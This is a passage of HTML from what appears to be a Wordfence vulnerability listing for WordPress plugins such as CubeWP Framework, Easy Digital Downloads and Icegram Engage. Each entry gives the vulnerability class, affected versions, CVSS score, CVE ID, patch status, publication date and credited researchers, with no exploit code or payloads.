<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/416da74662adf95005d209efd456836e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="416da74662adf95005d209efd456836e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener">Taichi Kashimura</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/836af607-a9cb-4ea2-b3e8-0cd42a04254b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4647620-e06a-49d5-8f9d-a59cb5a999b1" target="_blank" rel="noopener">CubeWP Framework &lt;= 1.1.30 &#8211; Authenticated (Subscriber+) SQL Injection via &#8216;relation_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6453" target="_blank" rel="noopener noreferrer">							CVE-2026-6453						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">CubeWP Framework</a> <span class="wfvr-software-slug">[cubewp-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/05990c2d2635cef18ddf1e675469a91b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05990c2d2635cef18ddf1e675469a91b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener">Louis Deschanel (JeanJeanLeHaxor)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3fa2c8b95407509d805e36f901ce7bdf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3fa2c8b95407509d805e36f901ce7bdf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener">Pascal SUN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4647620-e06a-49d5-8f9d-a59cb5a999b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a812aad-d769-4c28-8035-471bd3a50faa" target="_blank" rel="noopener">Easy Digital Downloads &lt;= 3.6.9 &#8211; Authenticated (Admin) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66476" target="_blank" rel="noopener noreferrer">							CVE-2026-66476						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</a> <span class="wfvr-software-slug">[easy-digital-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a812aad-d769-4c28-8035-471bd3a50faa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1543265e-dbbf-4d48-aaa9-353e2a5c3fe9" target="_blank" rel="noopener">Icegram Engage &lt;= 3.1.42 &#8211; Authenticated (Contributor+) Second-Order SQL Injection via &#8216;messages[][id]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16087" target="_blank" rel="noopener noreferrer">							CVE-2026-16087						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram" target="_blank" rel="noopener">Icegram Engage – Popups, Optins, CTAs &amp; Lead Generation</a> <span class="wfvr-software-slug">[icegram]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1543265e-dbbf-4d48-aaa9-353e2a5c3fe9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1dbc2ca-eb3f-4c0f-a5c0-28579f694237" target="_blank" rel="noopener">Improved Save Button &lt;= 1.2.1 &#8211; Authenticated (Author+) Second-Order SQL Injection via &#8216;meta_key&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16092" target="_blank" rel="noopener noreferrer">							CVE-2026-16092						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/improved-save-button" target="_blank" rel="noopener">Improved Save Button</a> <span class="wfvr-software-slug">[improved-save-button]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1dbc2ca-eb3f-4c0f-a5c0-28579f694237" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de11c9ad-0b9f-4934-8dc9-dc324d77d702" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.14 &#8211; Insecure Direct Object Reference to Authenticated (Instructor+) Arbitrary Attachment Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5060" target="_blank" rel="noopener noreferrer">							CVE-2026-5060						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de11c9ad-0b9f-4934-8dc9-dc324d77d702" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ca06c0-6a7d-43ee-ac59-698e0f525e23" target="_blank" rel="noopener">Plugin Organizer &lt;= 10.2.4 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15304" target="_blank" rel="noopener noreferrer">							CVE-2026-15304						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugin-organizer" target="_blank" rel="noopener">Plugin Organizer</a> <span class="wfvr-software-slug">[plugin-organizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0762f07d2d241bc80d9a4817b0625b83.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0762f07d2d241bc80d9a4817b0625b83"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener">zhuxuan wu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ca06c0-6a7d-43ee-ac59-698e0f525e23" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/746eec41-e8d2-4c51-b63e-726eeadbb2ab" target="_blank" rel="noopener">Taskbuilder &lt;= 5.0.9 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15267" target="_blank" rel="noopener noreferrer">							CVE-2026-15267						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/taskbuilder" target="_blank" rel="noopener">Taskbuilder – Project Management &amp; Task Management Tool With Kanban Board</a> <span class="wfvr-software-slug">[taskbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/48c75fb70feac5c77a422be7b9c6a1f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="48c75fb70feac5c77a422be7b9c6a1f8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener">zalomkiller</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/746eec41-e8d2-4c51-b63e-726eeadbb2ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0d562f-cf21-487b-8386-066d24bdbb13" target="_blank" rel="noopener">WP Hotel Booking &lt; 2.3.2 &#8211; Authenticated (Custom role+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15153" target="_blank" rel="noopener noreferrer">							CVE-2026-15153						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">WP Hotel Booking</a> <span class="wfvr-software-slug">[wp-hotel-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0d562f-cf21-487b-8386-066d24bdbb13" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/950908c8-9afc-4fc4-aa02-0c9790cdcb4c" target="_blank" rel="noopener">Admin Columns for ACF Fields &lt;= 0.3.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15262" target="_blank" rel="noopener noreferrer">							CVE-2026-15262						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-columns-for-acf-fields" target="_blank" rel="noopener">Admin Columns for ACF Fields</a> <span class="wfvr-software-slug">[admin-columns-for-acf-fields]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/950908c8-9afc-4fc4-aa02-0c9790cdcb4c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50eef578-9094-47ac-a451-04ebd9e6e2f8" target="_blank" rel="noopener">Advanced Woo Labels &lt;= 2.48 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;bg_color&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15662" target="_blank" rel="noopener noreferrer">							CVE-2026-15662						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-woo-labels" target="_blank" rel="noopener">Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce</a> <span class="wfvr-software-slug">[advanced-woo-labels]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50eef578-9094-47ac-a451-04ebd9e6e2f8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/313613ea-18cf-4e7d-aa75-586b80752edb" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates &lt; 2.7.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13330" target="_blank" rel="noopener noreferrer">							CVE-2026-13330						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</a> <span class="wfvr-software-slug">[animation-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/313613ea-18cf-4e7d-aa75-586b80752edb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f06b745-8968-41cb-96b0-ff0f42af114d" target="_blank" rel="noopener">Auto Featured Image (Auto Post Thumbnail) &lt;= 5.0.4 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61970" target="_blank" rel="noopener noreferrer">							CVE-2026-61970						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail" target="_blank" rel="noopener">Auto Featured Image (Auto Post Thumbnail)</a> <span class="wfvr-software-slug">[auto-post-thumbnail]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f06b745-8968-41cb-96b0-ff0f42af114d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93060cf-2df3-4d45-a1f2-304f443d58bc" target="_blank" rel="noopener">Booking System Trafft &lt;= 1.0.17 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8791" target="_blank" rel="noopener noreferrer">							CVE-2026-8791						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system-trafft" target="_blank" rel="noopener">Booking System Trafft</a> <span class="wfvr-software-slug">[booking-system-trafft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bbe3fab00912827f35b45e537ae8af7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bbe3fab00912827f35b45e537ae8af7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener">Hardik Patel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93060cf-2df3-4d45-a1f2-304f443d58bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/200f6173-72cd-4bf7-86b7-f5308b84364b" target="_blank" rel="noopener">Business Directory Plugin – Easy Listing Directories for WordPress &lt;= 6.4.24 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
